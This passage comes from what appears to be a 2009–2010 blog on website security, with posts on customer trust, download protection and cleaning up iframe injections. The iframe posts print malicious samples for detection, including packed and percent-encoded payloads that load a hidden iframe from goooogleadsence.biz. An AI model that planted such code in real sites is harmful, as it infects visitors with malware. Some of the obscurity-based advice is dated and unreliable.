when you consider how many negative events can transpire as the result of a worm attack. The most obvious effect will be the loss of traffic that will be seen soon after the worm has infected your website.<br /><br />Everyday there are thousands of new internet users online. Despite the fact that more people all the time are making purchases on the internet, there are a great deal of consumers who remain uneasy about the process and because of that are timid about the internet. Consumers are becoming more and more smarter, more savvy and more guarded about what can put them at risk. Online customers need to be confident that their personal information is safe and that their privacy will be upheld at all times.<br /><br />One study by Forrester Research, Inc., uncovered that a whopping 84 percent of consumer survey respondents indicated they didn't think retailers were doing enough to protect them online. The other finding from London-based TNS PLC, a market research company, found that 75 percent of online shoppers surveyed say they had abandoned a retail site due to security concerns.<br /><br />Website business owners are constantly trying to improve business. What many don't realize is that by improving their website security, they can improve their sales. Customers say that the security of a website is the number one reason why they do or do not shop on particular websites.<br /><br />Websites have emerged as the target of choice for money hungry hackers. The ramifications for companies are clear: Loss of data, loss of consumer confidence and loss of brand integrity. No company can afford the black mark of a website hack.<br /><br />Consider the fact that 8 out of 10 websites visited each day have a serious security vulnerability that puts corporate and customer data at risk. Add to that the irreparable harm done to a company whose brand is compromised by a publicized attack. It's a call to action for any company doing any of its business on the Web.<br /><br />Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most website owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience.<br /><br />As an internet merchant, an important asset for you is the credibility and trust your website conveys to prospective customers. It may seem like a minor thing, but if visitors trust you and your site, they'll more likely buy something, and the more credibility you have, the higher your conversion rate will be.<br /><br />Conversion Rate is the number of visitors on your site who actually do what you want them to. For instance if you get 1000 visitors on your site a day and 20 of them buy your product, your conversion rate is 2%. Credibility is crucial if you want to make money with your web site. Your website visitors must have trust in your company. It's pointless to spend a lot of work on getting visitors from search engines if these visitors don't convert to sales.<br /><br />It makes sense for you as a website owner to remove all the fear, doubt, and suspicion that accompanies making a buying decision online. When there is no hesitation to do what you want your online visitors to do, your conversion rates will increase. When you increase the amount of traffic that trusts you, more people will do what you want them to do. Any doubt or hesitation on their part, substantially decreases your chances of making the sale and lowers your conversion rate.<br /><br />Website security is of major importance to website owners and the people who are using the websites. As a site owner you are responsible for ensuring that your users are able to view your website without the risk of problems associated with malware, viruses and trojans.<br /><br />Security is an extremely important consideration for any businesses, especially if your business is connected to the internet. When conducting business across the internet you are faced with issues like mitigating security risks and building customer trusts.<br /><br />Establishing trust with the customers is highly essential for earning profits and higher sales. The trust factor is the same for a physical shop as well as for a website. If you have offered a quality product the first time, the same thing is expected when they come a second time for purchase and if you fail to offer that similar quality, they look for another website.<br /><br />A site that succeeds in developing a confidence factor in their clients are successful in selling their products/services to them. The Market is basically dominated by feelings and emotions of the customers. A product that fulfills clients' needs are demanded repeatedly by them, thus creating brand loyalty.<br /><br />People's trust, once broken, is difficult to restore. The reasons might be many and different in nature. Sometimes companies make fake promises at the time of sale and fail to fulfill it or are unable to deliver quality goods or services. Nearly all customers might have been duped of their expectations by merchants once in their lives, or have listened to their friends or relatives about the bad experience.<br /><br />There's no doubt that you have already heard numerous stories of hacked credit card details on the net. These incidents are widespread. This is the root cause why online buyers are a little doubtful to just type in their personal information whenever asked. They needed to know the website they are purchasing from is safe. Before customers are ready to give you sensitive information such as their home address or credit card number, they need to be reassured that your website is safe and secure. Ensuring your customer's security should be a top priority. After all, how will customers react if they learn that their sensitive information (such as credit card details) were compromised on your website?<br /><br />Hackers and harmful code writers can intrude a site of electronic commerce for the purpose of theft of invaluable details, such as the number of a credit card and other helpful information. Your web site, certainly, will be mentioned and can become a dwelling of cybercriminals. It can force you to lose your valuable clients, and also electronic business. Considering that most hackers spend hours every day trying to find new exploits, hacking into sites and looking for opportunities to steal cash from hard working business owners, you need to put forth the same effort to protect your website.<br /><br />Thinking that your data is safe does not mean your database of sensitive organization information has not already been cloned and is resident elsewhere ready to be sold to the highest bidder. To make matters worse, only recently, it has been discovered that hackers are not simply selling your information; they're also selling the fact that you have vulnerabilities to others. It seems that most hack attacks are discovered months after the initial breach simply because attackers do not want and will not leave an audit trial. Hackers are interested in stealing the data and leaving it intact.<br /><br />With the increased accessibility to information on the Internet, web security is a vital necessity. Attacks can range from simple nuisances to dangerous compromises of sensitive data. It is important, during website development, that all possible security threats be considered to ensure adequate protection of the website as well as end users.<br /><br />If you're not doing everything in your power to make your website visitors feel safe and secure while buying from your website then you could be losing up to 49% of your sales. And this has nothing to do with how persuasive your sales pitch is or how fancy your website looks. When it comes to making that critical decision whether to buy from you or not, the final straw is the consumer's concerns about their online security. You cannot afford to ignore these facts, especially in these times of recession when online shoppers are looking for real value and are becoming pickier about where they spend their dollars.<br /><br />You should now hopefully realize that the most important aspect of operating an online business is keeping your investments secure at all times. The internet is a very dangerous place, especially for business that conduct hundreds or thousands of dollars in eCommerce each and every day. Having a secure website not only prevents the loss of profits, but it also boosts sales as your customers will be more confident when shopping with you if they know that your site is safe.<br /><br />Most of all, keep in mind that when you support your website with the appropriate website security, you are increasing the trust of your customers, which in return increases sales for you. Website security is essential, make sure you are doing all that you can to ensure a safe site for you and your customers.<br /><br />So now that you know that website security might as well stand for increased confidence and sales, what are you doing to ensure that your customers are getting the right security signals from you?<br /><br />If you want more information on plugging the security loopholes in your website, please visit the following website:<br /><br /><strong><a href="http://www.websiteprotection.net/">http://www.websiteprotection.net/</a></strong><br />-<br />-Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-5107868459190274462010-03-05T18:14:00.000-08:002010-03-05T18:23:03.829-08:00The Risks of Not Having Website Protection and Security<p></p><p> </p><p><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='249' src='https://www.blogger.com/video.g?token=AD6v5dxkthD3v8JAK-47DQIr_ZuQ9hUbGCTtohQHUMuZNHIkQaVPFos8Kq0dbuLBjQyW5dnzE-XqAZICeepd0VzV9w' class='b-hbp-video b-uploaded' frameborder='0'></iframe></p><p> </p><p> </p>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-12963704436134461502010-02-28T12:20:00.000-08:002010-02-28T13:33:15.099-08:00Basic Website Protection and Security StepsMost people who have websites do not realize that it requires only a few simple steps to ensure some degree of security for your website and download products. No matter what type of digital product you're selling on the Internet, it is critical that you review your digital delivery method to make sure people aren't walking away with your products. A few lost sales may not seem like much, but over time they can really add up to a substantial loss of revenue. There are a few steps you need to think about in order to keep those who have not paid from stealing something you've worked long and hard at creating.<br /><br />The following are the most Basic Protection and Security Steps (BPASS) that anyone selling digital products online must take. These take only minutes to do and no special software or programming knowledge is required. Best of all, it costs you nothing to implement them.<br /><br />BPASS-1<br /><br />Most people who sell digital download products store their downloads as PDF documents. Nearly all search engines can read and list PDF documents. This means that you must never save or upload a product you want to sell as a PDF file. Many search engines can also convert the PDF files into HTML documents. This means these browsers not only have access to download your PDF file,but can also download your source file as well.<br /><br />A simple way of keeping your files out of the reach of search engines is to upload them as a zip file. Search engines cannot currently look inside zip files to list their contents. You can use many free programs like WinZip to create a Zip archive. You can hide your digital product, ebook in the ZIP archive. Search engines typically do not go near any file with a .ZIP extension.<br /><br />BPASS-2<br /><br />All web servers are configured to display a default page for a directory if a default file exists. That is how your home page is found when someone simply enters a domain name for the URL for a web site and the home page is displayed. A server is configured to search a list of default file names and if it finds a match, it displays the page. The default files, index.* could be similar to what is shown below, where * is the index page extension.<br /><br />index.htm<br />index.html<br />index.shtml<br />index.php<br /><br />When someone goes to your site by typing in your URL, the index page is what they normally see first. This prevents viewing other pages or files you may have in the root directory. What your visitor actually sees in this case is your home page.<br /><br />The other directories(sub-folders) on your website, the ones below your root directory, which is typically called "public", or "public_html", do not normally have this index page. If the index page is not there, your visitor may be able to view every web page or file you have in that directory. A folder without an index page is open and everyone can find your product and download it if they search for it. You thus should create an index page for all your folders. This is especially important for your download directory.<br /><br />The index page can be used in any directory on a web site except those directories that already utilize an index page or default page. This includes the root directory. Never place one of these files in the root directory, never overwrite an index page or default page that already exists and never place an index page in a directory where another index page or default page already exists.<br /><br />A basic index.* page would have, at minimum the following:<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnJYZ9uliU1git5_QMizQ6U5Aivv7BmRlWFwJd4LEAR1AD962EZfhDJg1_CmCP-OBDsEVOECFEnq74hHtJldZpMNFXYn0wmft5to6yF5ikt_bKul0VPzrT2qlovKxcIaSiofJ5Tgj9ZQY/s1600-h/index1.jpg"><img style="WIDTH: 86px; HEIGHT: 131px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5443397407528491410" border="0" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnJYZ9uliU1git5_QMizQ6U5Aivv7BmRlWFwJd4LEAR1AD962EZfhDJg1_CmCP-OBDsEVOECFEnq74hHtJldZpMNFXYn0wmft5to6yF5ikt_bKul0VPzrT2qlovKxcIaSiofJ5Tgj9ZQY/s400/index1.jpg" /></a><br />The above basic index page would show a blank web page. Instead of seeing all the files that you have in the sub-folder, they would simply see a blank web page.<br /><br />If you want, you can put some text or graphics between and tags.<br />You can add some text that perhaps says: "Internal server error. Please contact system administrator."<br /><br />The text will give the impression that the person trying to get into your site, caused some type of server error and so will hopefully stop them from going any further. The modified index page is shown below:<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJxY5yyEcKoBAQGDMZZBQeUC577jWD4PTjqXTibMHnGGikXd6RzaIk0N2yt8dfJEJ48NC50YZFeyVyNWoLZNubGM7tIAqJr3nH7hflgLNNh6Dv21PWmpUma-YGK9HrUUBLJzVSjSW6IK0Q/s1600-h/index2.jpg"><img style="WIDTH: 400px; HEIGHT: 160px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5443399791759713890" border="0" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJxY5yyEcKoBAQGDMZZBQeUC577jWD4PTjqXTibMHnGGikXd6RzaIk0N2yt8dfJEJ48NC50YZFeyVyNWoLZNubGM7tIAqJr3nH7hflgLNNh6Dv21PWmpUma-YGK9HrUUBLJzVSjSW6IK0Q/s400/index2.jpg" /></a><br />You can also take the index web page one step further. You can redirect spying eyes from your website directories back to your home index page in your root directory. You can use what is called a "meta refresh" tag. The tag looks like the following:<br /><br />META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name"<br /><br />You would replace "yourdomain_name" with your actual domain name or whatever URL you would like to put there.<br /><br />The following shows the index page with the meta refresh tag:<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT5GFaSlaflmVhIiC9AJ9ZlYhGZxsaBkNuJvce2ql98cYcAg-XE39FcQ5AG9v52wGv1VH99p_uABGeFyB-E9ScXnb642LHzW8LC7L8J79V6-pT6YjYxCcbG1JeJC9qCII4KaBpOh4iTzmY/s1600-h/index3.jpg"><img style="WIDTH: 400px; HEIGHT: 103px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5443401857570468642" border="0" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT5GFaSlaflmVhIiC9AJ9ZlYhGZxsaBkNuJvce2ql98cYcAg-XE39FcQ5AG9v52wGv1VH99p_uABGeFyB-E9ScXnb642LHzW8LC7L8J79V6-pT6YjYxCcbG1JeJC9qCII4KaBpOh4iTzmY/s400/index3.jpg" /></a><br />In the meta tag, the page refresh has been set to zero (0) seconds, which is just short enough for redirecting to the specified URL.<br /><br />If you are using an index page with the meta-refresh tag only, then instead of someone seeing a blank web page, they actually get re-directed to your Home page. If this was a casual surfer who just happened to end up at your website by mistake, then they will find themselves on your Home front page, and, you might end up getting a customer, a good side benefit of the index.html page with meta-refresh tag.<br /><br />Please don't forget that If you do not create an index.htm or index.html file, etc., you'd be allowing everyone to directly access the root directory of the folder where you store your downloads and cause you loose of potential income.<br /><br />BPASS-3<br /><br />You can easily stop search engines from indexing your web pages. An indexed web page means anyone can find it on the internet when they do a search. This disallows search engine spiders from reading and listing the download pages that link to your products. This must be on your download page(s) and any other web page that you do not want indexed for one reason or another.<br /><br />On the web page, between the and [head] and [/head] tags, add the following “Robot” tag.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwSgIdri95ZegRVBDi-BM-oFcvhBY9shTTzKbdo8mphEA6B-9042AryeYvRXzeGbtPeTB-7c1LB8lYxh0n2oOc5qhWnytSot6dTQOO4BZ_pjcGztB9346rofNjvwNnuXv0JmYx8lv3NIwb/s1600-h/index4.jpg"><img style="WIDTH: 400px; HEIGHT: 58px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5443404688501112786" border="0" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwSgIdri95ZegRVBDi-BM-oFcvhBY9shTTzKbdo8mphEA6B-9042AryeYvRXzeGbtPeTB-7c1LB8lYxh0n2oOc5qhWnytSot6dTQOO4BZ_pjcGztB9346rofNjvwNnuXv0JmYx8lv3NIwb/s400/index4.jpg" /></a><br />The tag prevents search engine spiders from reading and listing the download pages that link to your eBooks. This "Robot" tag tells the spider that this page is not to be spidered or indexed. As a result it should never show up on a search.<br /><br />BPASS-4<br /><br />Search engines scan only two levels down your domain; try keeping your downloadable product three or four levels down;<br />– for example, www.mydomain/directortyA/directoryB/directoryC/download file.<br /><br />BPASS-5<br /><br />Make sure to name your download folders and files with strange names and change them often. Don't use common names like downloads.htm or thankyou.htm, as someone could go to the search engines and easily find your documents in this way.<br /><br />Change your download links frequently. To prevent unscrupulous people from posting your download links on forums or message boards, change the folder or file name where you store them from time to time, even if it means having to change the download links in your merchant account.<br /><br />BPASS-6<br /><br />Protect folders by permissions, directory and script file permissions.<br /><br />A variety of files and directories in your website need to be given the correct permissions to work properly. Giving permissions to files or directories in the Unix world is called CHMOD (change mode). Chmod is a Unix command that lets permission levels be assigned to each file or directory. The proper CHMOD is also needed to help you with your website protection and security.<br /><br />The following are the basic file permissions:<br /><br />Files: 644<br />Folders: 755 (with index page in it)<br />Images: 644<br />CGI scripts: 755<br />Php scripts: 644<br /><br />Folders with CHMOD 755 must have an index page in it. By default, your public or public_html directory is typically set to CHMOD 755. With this setting, if a Web surfer connects to your website, the server will display either your home page (if a file with the name index.html, index.htm, or index.shtml, etc., exists) or a listing of all the files in that directory. This also holds true for any sub-folder in your domain, which is why you need an index page in every folder on your website.<br /><br />Always make sure your folders are given 755 permissions (with index file in it) OR 711 permissions. 711 gives Access denied error. This permission setting will not show a file listing. If there is no index page, the Web surfer will receive a "Forbidden" error message.<br /><br />The CHMOD capability depends on two conditions:<br /><br />1) The server you are connected to must support the CHMOD command.<br />2) You must have access rights to change the attributes of that remote file or directory.<br /><br />Make sure these two conditions are fulfilled.<br /><br />The 644 Files permissions represents the permissions of your web pages. Suppose you have just finished modifying your web page and you did not want anybody to update or to delete it. Then, give the web page file permission CHMOD 444 and it will have this effect. This gives everybody, including the owner (user), only read capability. If the owner turns off the write permission, the file is protected from accidental or deliberate destruction.<br /><br />You may have to set CHMOD 444 via your host CPanel in a browser. Make sure you check this out. If you entered your site via FTP, edit your web page file by adding a small change and then removing it. When you try to save the file, you should not be allowed to over-write it.<br />Once you have changed file persmission to CHMOD 444 on your web page, ensure that it still functions and runs properly. Whenever you need to edit your web page, simply change back to CHMOD 644, do your changes, and then change again to CHMOD 444.<br /><br />Having to change file permissions everytime you need to edit a web page might feel a bit tedious. Preventing attacks to your website which could stop all traffic to your website, may be well worth the extra few minutes needed to edit a web page via the CHMOD command.<br /><br />Summary<br /><br />Using these Basic Protection and Security Steps will give you a good degree of satisfaction, knowing that you have taken the most basic steps to protect your digital valuables - and at absolutely no cost to you.<br /><br />If you want greater security and more information on plugging the security loopholes in your website, please visit the following website:<br /><br /><a href="http://www.websiteprotection.net/"><strong><em>http://www.websiteprotection.net</em></strong></a><br /><br />--Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-86720139138743526892010-02-17T16:37:00.000-08:002010-02-20T22:37:05.103-08:00Why You Need Website Protection and Security!<p> </p><p><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dyxdLoJ3kkexJ5uOl9vmOSo4zIcMa_o7jGkMuZOLF-JK3W8rYlbRnzvFcqD0qBmarNJ15U5KfJKDAgcFU1kag' class='b-hbp-video b-uploaded' frameborder='0'></iframe></p>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-67098985985355652512010-01-17T20:19:00.000-08:002010-01-17T20:32:35.129-08:00Website Security StatisticsWeb security company <i>Cenzic</i> released a report detailing trends and numbers related to Web security for the first and second quarters of 2009.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfSEjzw7ttJAEpzvBBgQvYurTWmtuseZUsITLb0RFvtVboPPUx15FCfOMq9kbFtRvFR9_aG2vykZhaD6SZCaiuBy00BLfdPcXnyfetGHpHlGIAyNHQQ4a1jxVe9MErQE4jKctQqIx5RjVb/s1600-h/webvulner.gif"><img style="WIDTH: 400px; HEIGHT: 233px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5427930106351959634" border="0" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfSEjzw7ttJAEpzvBBgQvYurTWmtuseZUsITLb0RFvtVboPPUx15FCfOMq9kbFtRvFR9_aG2vykZhaD6SZCaiuBy00BLfdPcXnyfetGHpHlGIAyNHQQ4a1jxVe9MErQE4jKctQqIx5RjVb/s400/webvulner.gif" /></a><br /><br />Among the most serious vulnerabilities were path traversal (folder listing), cross-site scripting, cross-site request forgery and SQL injection. You may have to deal with all of these in order to make your website secure.<br /><br />A report by security company <i>Whitehat Security</i> has indicated that:<br />- Historically, 82% of assessed websites have had at least one issue of HIGH, CRITICAL, or URGENT severity<br />- 63% of assessed websites currently have issues of HIGH, CRITICAL, or URGENT severity<br />- Historically, websites average 17 vulnerabilities identified during the lifetime of the assessment cycle<br />- Websites currently average 6 open vulnerabilities<br /><br />A report by <i>The Web Application Security Consortium (WASC)</i> showed that for about 12186 sites tested, 97554 vulnerabilities were detected. The analysis showed that:<br />- more than 13% of all reviewed sites could be compromised completely automatically<br />- about 49% of web applications contain vulnerabilities of high risk level (Urgent and Critical)<br />- the most wide spread vulnerabilities are Cross-site Scripting, different types of Information Leakage, SQL Injection, HTTP Response Splitting<br />- administration issues were 20% more frequent cause of a vulnerability than system development errors<br />- the probability to compromise a host automatically rose from 7 to 13 %<br /><br /><b><i>"When Asked, Most Website Owners Stated That Their Website And Data Was Safe From Hackers. Over 73% Were Wrong!"</i></b><br /><br />Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.<br /><br />To help you with your website security, I recommend that you visit:<br /><br /><a href="http://www.websiteprotection.net/">http://www.websiteprotection.net/</a><br /><br />You will quickly learn how to combat these hackers.<br />Many of the solutions can be implemented almost immediately, providing you with your first line of defense.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-85195047459416676712009-11-10T21:48:00.000-08:002009-11-11T06:41:55.239-08:00Quick Reference Links To Fight Iframe InjectionsI have had many requests from people reading my articles on combatting iframe injection attacks to create a quick start page with the various links one can use to detect and recover from iframe injection attacks.<br /><br />These links are just a quick summary and you should read the full article to get the maximum benifits.<br /><br /><strong>CHECKING TO SEE IF YOUR WEBSITE IS SAFE</strong><br /><br />a) http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name<br /><br />Copy and paste the above link into your browser and then replace "yourdomain_name" with your actual website name, e.g., websiteprotection.net<br /><br />b) <a href="http://www.unmaskparasites.com/">http://www.unmaskparasites.com/</a><br /><br /><strong>IFRAME SCANNERS</strong><br /><br />a) <a href="http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt">http://www.diovo.com</a><br /><br />Using notepad editor, you need to change the following line in the script:<br /><br />$webpath ="Type your domain name here. Eg:http://www.diovo.com/"<br />which becomes:<br />$webpath ="http://www.yourdomain_name/<br />Where "yourdomain_name" is replaced with your actual domain name.<br />Test URL is:<br />http://www.yourdomain_name/clean.php?s=index.php&c=iframe<br />where:<br />s=webpage.ext<br /><br />b) <a href="http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html">http://www.websanity.co.uk</a><br /><br />Using notepad editor, change the following lines in the script as required:<br />define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types<br />define("IGNORE_BEFORE", strtotime('2009-08-01') );<br /><br />c) Auto Scanner Scheduler: <a href="http://www.splinterware.com/download/index.htm">http://www.splinterware.com</a><br /><br /><strong>FILE PERMISSIONS</strong><br /><br />CHMOD 444 to prevent writing to web page<br /><br /><strong>IFRAME DE-OBFUSCATORS</strong><br /><br />a) <a href="http://www.novirusthanks.org/javascript-deobfuscator.html">http://www.novirusthanks.org</a><br /><br />b) <a href="http://www.patzcatz.com/unescape.htm">http://www.patzcatz.com</a><br /><br />c) <a href="http://www.strictly-software.com/unpack-javascript.aspx">http://www.strictly-software.com</a><br /><br /><strong>IFRAME UNPACKERS</strong><br /><br />a) <a href="http://matthewfl.com/unPacker.html">http://matthewfl.com</a><br /><br />b) <a href="http://blog.shimazu.org/utils/packer_decoder.html">http://blog.shimazu.org</a><br /><br />c) <a href="http://www.strictly-software.com/unpack-javascript.aspx">http://www.strictly-software.com</a><br /><br /><strong>IFRAME PACKER</strong><br /><br />For those who want to see how packing is done with a javascript packer.<br />Make sure to check the "Base62 encode" box or else it will not work.<br /><br /><a href="http://dean.edwards.name/packer/">http://dean.edwards.name/packer</a><br /><br /><br />You should use this quick guide after you have read all related iframe injection articles.<br /><br />Don't forget that not all iframes are bad. Be sure before you delete.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-35067208394329758022009-11-08T22:29:00.000-08:002009-11-08T22:41:23.492-08:00New Malicious iFrame Injection - Mal/Iframe-NThe Mal/Iframe-N appears to be the latest malicious iframe injection attack on websites. I had touched on this briefly in other articles combatting malicious iframe injection attacks.<br /><br />Security researchers warn that this new injection attack has infected thousands of websites with malicious IFrames. In order to avoid detection, the malicious IFrames get their src attribute (their URL) through an "onload" JavaScript event.<br /><br />Since releasing detection for Mal/Iframe-N, SophosLabs have seen a rising number of detections. Detections are now into the thousands of websites affected by this threat. Some of the sites hit are also well known.<br /><br />Normally, malicious Iframe’s have the following form:<br /><br />[iframe src='http://url/'width='1'height='1'][/iframe]<br /><br />In the new attack there isn’t a direct "src=", they use "onload=" as follows:<br /><br />[frame onload="if (!this.src){ this.src='http://url'; this.height=1; this.width=1;}"].<br /><br />All the domains used so far have been based in Russia.<br /><br />The tools being used to inject these Iframes are currently adding them to the end of legitimate HTML as shown below:<br /><br />[html]<br />.<br />.<br />.<br />[/html]<br />[frame onload="if (!this.src).............<br /><br />This usually attacks vulnerabilities in your software so make sure you install critical patches for popular software such as Adobe Reader, Flash Player, Java Runtime Environment, Microsoft Office or Windows itself.<br /><br />You could also be infected with an obfuscated or packed javascript version of these malicious iframes.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-22470692267034970692009-11-08T12:02:00.000-08:002009-11-08T12:17:25.315-08:00More On Hidden Malicious Iframe InjectionsIf you have been reading my articles on combating malicious iframe injections, you will have noticed that these malicious iframes have a basic configuration as shown below:<br /><br />[iframe src='http://url/'width='1'height='1'style='visibility: hidden;'][/iframe]<br /><br />They have this configuration so that hackers can hide these unwanted iframes by making them invisible. The iframe is created with width and height of 1 pixel – visually it’s just a point. They also specify a style that makes it invisible: style='visibility: hidden;'<br /><br />These iframes are invisible to web surfers but they can be detected in the HTML code of your web page.<br /><br />To hide iframes in the HTML, hackers use obfuscated scripts. Apart from obfuscated scripts, hackers are now also using what is called packed javascripts. Packing javascripts is a good thing as it improves delivery and optimization. But, as always, these legitimate things can be used in a bad way to hide and insert malicious unreadable iframes into your web page. When you check the HTML code of such web pages you don’t see any iframes, just some JavaScript with unclear purpose with no URLs and suspicious words within it. And since many modern web pages contain dozens of third-party scripts (e.g. ads, statistics, widgets, etc.) webmasters usually overlook such scripts.<br /><br />Let us take the previous malicious iframe example and pack it. It would look like the following:<br /><br />eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){returnr[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('[02=\'3://4/\'5=\'1\'6=\'1\'7=\'8:9;\'][/0]',10,10,'iframe||src|http|url|width|height|style|visibility|hidden'.split('|'),0,{}))<br /><br />If you look at the above code, it is hard to see if it is malicious or not. You will notice some words that appear suspicious, but may not be. Sometimes you may not see any suspicious text at all.<br /><br />What you need to do is to unpack this compressed code when you are unsure whether the scripts being loaded are malicious or not.<br /><br />One site you can visit to unpack these compressed codes is at:<br /><br /><a href="http://www.strictly-software.com/unpack-javascript.aspx">http://www.strictly-software.com/unpack-javascript.aspx</a><br /><br />Simply copy the complete code, eval(function........) and paste into the upper box. Click on the ""Unpack" button. The final result will be shown in the second box and should be the actual code which should now be completely readable. Once the code is readable, you need to make sure that it is malicious or not before you delete it.<br /><br />To hide malicious code, hackers sometime encode their scripts multiple times, so that even if you execute such a script you’ll get just another obfuscated or compressed script. The malicious script decodes itself and creates another encoded script which in turn creates another hidden malicious iframe.<br /><br />Further investigation on malicious iframes has shown that, antivirus vendor Sophos, warns that a new injection attack has infected thousands of websites with malicious IFrames. In order to avoid detection, the rogue IFrames get their src attribute (their URL) through an "onload" JavaScript event. Aside from the heavy obfuscation, this attack makes use of a specific trick to avoid Web scanners. More specifically, decoding the string will result in an IFrame that doesn't have a direct src value. It uses a javascript "Onload" function to generate it. The src usually points to a third party server that attempts to infect visitors with malware. This usually attacks vulnerabilities in your software so make sure you install critical patches for popular software such as Adobe Reader, Flash Player, Java Runtime Environment, Microsoft Office or Windows itself. When you unpack the code, look for this.<br /><br />The battle against malicious iframe injections is a constant battle. It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-48004185027864080952009-10-31T20:31:00.000-07:002009-12-25T18:04:15.471-08:00Obfuscated iFrame Injection AttacksI have written several popular articles on iframe injections as you will find in this blog.<br /><br />The people who implemented my suggestions, reported they had quite a bit of success in avoiding these malicious iframe injection attacks. Their websites were now safe and their traffic was continuous.<br /><br />I had a friend who was a victim of these iframe injection attacks. When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some codes that were obfuscated that my friend had no explanation for.<br /><br />Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.<br /><br />Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.<br /><br />The following was the suspected malicious iframe injection obfuscated code:<br /><br />[Script Language='Javascript']<br />[!--<br />document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));<br />//--><br />[/Script]<br /><br />Researching the issue further I found a website that was able to deobfuscate, or decrypt, the code at:<br /><br /><a href="http://www.novirusthanks.org/services/javascript-unescape/">http://www.novirusthanks.org/services/javascript-unescape/</a><br /><br />or at:<br /><br /><a href="http://www.patzcatz.com/unescape.htm">http://www.patzcatz.com/unescape.htm</a><br /><br />What you do is copy only the obsfuscated code as shown below:<br /><br />%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D<br /><br />You then paste the code into the form box they provide and then click on "Deobfuscate".<br /><br />The following was the resulting malicious iframe injection code:<br /><br />[iframe src= http: //goooogleadsence.biz/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]<br /><br />By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.<br /><br />If you implement my suggestions, particulariy the 